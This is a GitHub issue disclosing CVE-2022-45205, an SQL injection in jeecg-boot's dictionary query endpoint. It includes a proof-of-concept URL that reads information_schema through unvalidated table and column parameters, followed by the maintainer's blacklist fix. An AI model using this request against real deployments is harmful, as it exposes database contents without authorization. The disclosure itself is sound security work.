Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[CVE-2022-45205]/sys/dict/queryTableData is affected by sql injection #4128

Closed
azraelxuemo opened this issue Oct 25, 2022 · 2 comments
Closed

Comments

@azraelxuemo
Copy link

azraelxuemo commented Oct 25, 2022

SysDictMapper.xml

queryDictTablePageList。You can see that no precompiling is performed
截屏2022-10-25 15 24 58

SysDictController.java

截屏2022-10-25 15 25 29

SysDictServiceImpl.java

截屏2022-10-25 15 26 05

vuln

There is no control over the user's control over the table, column, and database name, so that the attacker can directly obtain all data

poc

http://192.168.1.1:8088/jeecg-boot/sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA
There is no control over the user's control over the table, column, and database name, so that the attacker can directly obtain all data

MySQL background code

截屏2022-10-25 15 28 13

result in the website

截屏2022-10-25 15 33 29

pagesize control the result num,and code text control the column_name you want,table control the tables

patch

Change to precompile
Verify the fields entered by the user

@zhangdaiscott
Copy link
Member

zhangdaiscott commented Oct 30, 2022

针对这个问题,我们提供了一个表名黑名单工具类,针对敏感的表,比如用户表,可以加入配置,这样我们就会check提供非法

org\jeecg\common\util\security\AbstractQueryBlackListHandler.java

加入这个check即可

if(!dictQueryBlackListHandler.isPass(dictCode)){
			return result.error500(dictQueryBlackListHandler.getError());
		}

文档
http://doc.jeecg.com/3009695

@zhangdaiscott
Copy link
Member

已处理

@azraelxuemo azraelxuemo changed the title /sys/dict/queryTableData is affected by sql injection [CVE-2022-45205]/sys/dict/queryTableData is affected by sql injection Dec 1, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants